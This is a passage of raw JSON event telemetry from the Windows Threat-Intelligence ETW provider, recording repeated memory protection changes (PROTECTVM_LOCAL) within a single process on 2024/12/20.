type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"32","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C5E0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":82,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909711,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C4F0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C630","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":83,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909724,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C900","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365CB30","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":84,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909777,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365CA40","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C5E0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":85,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909790,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C950","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365CA40","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":86,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909803,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C5E0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C810","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":87,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909816,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C900","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C630","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":88,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909828,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C4F0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C540","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":89,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909840,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C540","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C7C0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":90,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909853,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C4F0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C4A0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":91,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909865,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365CB30","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C630","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":92,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909878,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365CB30","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C590","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":93,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909891,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C900","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C9F0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":94,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909914,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C4F0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C4F0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":95,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909936,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365CA40","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C540","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":96,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910092,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C8B0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C950","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":97,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910115,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C9F0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C7C0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":98,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910127,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C6D0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C950","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":99,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910139,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C4F0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C5E0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":100,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910152,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365CB30","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C7C0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":101,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910166,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C4F0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C4F0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":102,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910178,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C4A0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365CB30","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":103,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910192,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C8B0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C630","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":104,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910204,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C8B0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C4F0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":105,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910216,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C9F0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C4F0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":106,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910228,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C4F0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C540","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":107,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910241,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C720","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 